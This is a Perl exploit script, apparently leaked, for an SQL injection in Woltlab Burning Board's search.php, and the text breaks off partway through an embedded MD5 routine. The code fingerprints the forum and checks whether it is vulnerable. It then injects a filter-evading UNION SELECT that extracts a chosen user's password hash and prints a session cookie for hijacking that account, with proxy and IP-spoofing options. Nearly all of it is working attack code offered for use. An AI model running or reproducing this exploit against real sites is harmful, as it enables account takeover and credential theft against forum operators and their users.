#!/usr/bin/perl # Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl # written by trew # # should work on every wbb regardless of php settings. # # v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie # v 1.1 - added wbblite support (thx to lama) # # # # !PRIVATE! - !PRIVATE! # # Leaked by some morons from egocrew # use strict; # 1337 use warnings; # 31337 use LWP::UserAgent; use HTTP::Response; use HTTP::Status; use Getopt::Std; getopt('uisUpAclC'); our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_l, $opt_C ); my $target = shift; sub do_request($$); if ( !$target ) { &HELP_MESSAGE; } my ( $host, $folder ); if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) { $host = $1; $folder = ( $2 ? $2 : '/' ); if ( $folder !~ /\/$/ ) { $folder .= '/'; } $target = "http://$host$folder" . 'search.php'; } else { &HELP_MESSAGE; } my $ip = ( $opt_i ? $opt_i : '' ); my $searchstring = ( $opt_s ? $opt_s : 'board' ); my ( $userid, $userpassword, $proxy, $proxyip ); ( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U; ( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p; my $uid = ( $opt_u ? $opt_u : 1 ); my $useragent = ( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/' ); my $prefix = ( $opt_c ? $opt_c : 'wbb2_' ); my $lite = ( $opt_l ? $opt_l : 0 ); my $isHash = 0; print "burned.pl written by trew\n"; print "report errors \@ trew\@safe-mail.net.. thx\n"; print "[x] Attacking $target...\n"; if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; } if ( !$lite ) { print "[x] Checking wbb version...\n"; if ( do_request( '', 'editor.jar' ) =~ /404 Not Found/ ) { print "[x] Looks like a wbblite\n"; $prefix = "" if ( !$opt_c ); $lite = 1; } else { print "[x] Looks like a normal wbb\n"; } } if ( !$lite ) { if ( !$opt_c ) { my $headers = do_request( '', '' ); if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) { $prefix = $1; } else { print $headers} } print "[x] Cookie prefix: $prefix\n"; } print "[x] Vulnerable check:"; my $answer; my $pre; $answer = do_request( '\'', '' ); if ( $answer =~ /FROM (.*?)_boards/ ) { $pre = $1; print " Vulnerable\n"; } elsif ($answer =~ /Die Suche ergab keine/ or $answer =~ /No results were found for this search/ or $answer =~ /Your search is invalid/ or $answer =~ /Ihre Suchabfrage ist/ ) { print " No Idea\n"; print "[x] Searchstring was not found, try a different one with -s\n"; exit; } elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/ or $answer =~ /Access denied/ ) { print " No Idea\n"; print "[x] search.php only for users,"; print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U; print " give me userid+password with -U\n" if !$opt_U; exit; } else { print " Not Vulnerable!\n"; #print $answer; exit; } print "[x] Unleashing black magic...\n"; $answer = do_request( ' UNION/*s12s*/ SELECT/*t35s*/ password , password /*er35*/ FRoM ' . $pre . '_users WHeRE/*esr35*/ userid=' . $uid . '/*', '' ); if ( $answer =~ /${folder}search.php/ and $answer =~ /([a-f0-9]{32})/ ) { print "[x] Looks good!\n"; print "[x] Userid: $uid\n"; print "[x] Hash: $1\n"; if ( !$opt_C ) { print "[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n"; } } else { print "[x] Looks bad!\n"; print $answer; } sub HELP_MESSAGE() { print "burned.pl written by trew\n" . "perl $0 [options] url\n" . "examples:\n" . "perl $0 woltlab.de/forum/\n" . "perl $0 -u 2 -i woltlab.de/de/forum/\n" . "overwrite -c and -l only when the auto-check " . "gives you a false result\n" . "use -C when you need some special cookies\n" . "options :\n-u userid of victim [1]\n" . "-i faked client-ip []\n" . "-s searchstring [board]\n" . "-U userid:password or userid:pwhash [none]\n" . "-p proxyip:proxyport [none]\n" . "-A user-agent [firefox 1.5.09]\n" . "-c cookie-prefix [auto-check]\n" . "-l wbblite mode [auto-check]\n" . "-C raw cookie\n"; exit; } sub do_request($$) { my $string = shift; my $otherurl = shift; if ($otherurl) { $target = "http://$host$folder" . $otherurl; } else { $target = "http://$host$folder" . 'search.php' } $string = '/*' if ( !$string ); my $ua = LWP::UserAgent->new; if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); } my $request = new HTTP::Request( 'POST', $target ); $request->content( 'boardids%5B0%5D=1&boardids%5B1%5D=2,3,4)' . $string . '&send=1&searchstring=' . $searchstring ); $request->content_type('application/x-www-form-urlencoded'); $request->header( 'User-Agent' => $useragent ); if ($opt_U) { my $userhash; if ( !$isHash ) { $userhash = md5($userpassword); } else { $userhash = $userpassword; } my $cookie = $prefix . 'userid=' . $userid . ';' . $prefix . 'userpassword=' . $userhash; $request->header( 'Cookie' => $cookie ); } elsif ($opt_C) { $request->header( 'Cookie' => $opt_C ); } $request->header( 'Client-Ip' => $ip ); my $response = $ua->request($request); my $body = $response->content; my $headers = $response->headers_as_string; $body = $response->error_as_HTML if ( $response->is_error ); return $headers if ( $string eq '/*' and !$response->is_error ); return $body; } # MD5 Code ripped from Libwhisker for bigger portability # thx rfp :) { my ( @S, @T, @M ); my $code = ''; sub md5 { return undef if ( !defined $_[0] ); # oops, forgot the data my $DATA = _md5_pad( $_[0] ); &_md5_init() if ( !defined $M[0] ); return _md5_perl_generated( \$DATA ); } sub _md5_init { return if ( defined $S[0] ); my $i; for ( $i = 1 ; $i <= 64 ; $i++ ) { $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) ); } my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 ); for ( $i = 0 ; $i < 64 ; $i++ ) { $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ]; } @M = ( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2, 0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9 ); &_md5_generate(); my $TEST = _md5_pad('foobar'); if ( _md5_perl_generated( \$TEST ) ne '3858f62230ac3c915f300c664312c63f' ) { die('Error: MD5 self-test not successful.'); } } sub _md5_pad { my $l = length( my $msg = shift() . chr(128) ); $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 ); $l = ( $l - 1 ) * 8; $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 ); return $msg; } sub _md5_generate { my $N = 'abcddabccdabbcda'; my ( $i, $M ) = ( 0, '' ); $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems $code = <